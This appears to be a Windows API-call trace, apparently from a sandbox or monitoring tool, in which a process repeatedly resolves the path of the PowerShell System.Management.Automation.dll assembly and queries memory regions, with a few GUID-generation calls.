	[0351.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.378] VirtualQuery (in: lpAddress=0x1cbf90, lpBuffer=0x1cce50, dwLength=0x30 | out: lpBuffer=0x1cce50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cca80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.379] VirtualQuery (in: lpAddress=0x1cbf90, lpBuffer=0x1cce50, dwLength=0x30 | out: lpBuffer=0x1cce50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.379] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.379] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.380] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.380] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.380] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.380] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.380] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.380] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.380] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.381] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.381] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.381] VirtualQuery (in: lpAddress=0x1cbbc0, lpBuffer=0x1cca80, dwLength=0x30 | out: lpBuffer=0x1cca80*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.381] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.381] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.382] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.382] VirtualQuery (in: lpAddress=0x1cbf80, lpBuffer=0x1cce40, dwLength=0x30 | out: lpBuffer=0x1cce40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.382] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0x740114f6, Data2=0x2314, Data3=0x4c22, Data4=([0]=0x88, [1]=0x9d, [2]=0x7, [3]=0x1d, [4]=0x67, [5]=0xd2, [6]=0x95, [7]=0xdb))) returned 0x0
	[0351.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.383] CoCreateGuid (in: pguid=0x1cd770 | out: pguid=0x1cd770*(Data1=0xd8a528de, Data2=0x8cce, Data3=0x4a34, Data4=([0]=0xaf, [1]=0xe7, [2]=0x17, [3]=0x38, [4]=0x28, [5]=0x8c, [6]=0x83, [7]=0x7a))) returned 0x0
	[0351.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccc10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.385] VirtualQuery (in: lpAddress=0x1cb5f0, lpBuffer=0x1cc4b0, dwLength=0x30 | out: lpBuffer=0x1cc4b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.385] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.386] VirtualQuery (in: lpAddress=0x1cb5f0, lpBuffer=0x1cc4b0, dwLength=0x30 | out: lpBuffer=0x1cc4b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.386] VirtualQuery (in: lpAddress=0x1cb680, lpBuffer=0x1cc540, dwLength=0x30 | out: lpBuffer=0x1cc540*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.386] VirtualQuery (in: lpAddress=0x1cb5f0, lpBuffer=0x1cc4b0, dwLength=0x30 | out: lpBuffer=0x1cc4b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.387] VirtualQuery (in: lpAddress=0x1cb680, lpBuffer=0x1cc540, dwLength=0x30 | out: lpBuffer=0x1cc540*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.387] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.387] VirtualQuery (in: lpAddress=0x1cb5f0, lpBuffer=0x1cc4b0, dwLength=0x30 | out: lpBuffer=0x1cc4b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.388] VirtualQuery (in: lpAddress=0x1cb680, lpBuffer=0x1cc540, dwLength=0x30 | out: lpBuffer=0x1cc540*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0351.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0351.388] VirtualQuery (in: lpAddress=0x1cb5f0, lpBuffer=0x1cc4b0, dwLength=0x30 | out: lpBuffer=0x1cc4b0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
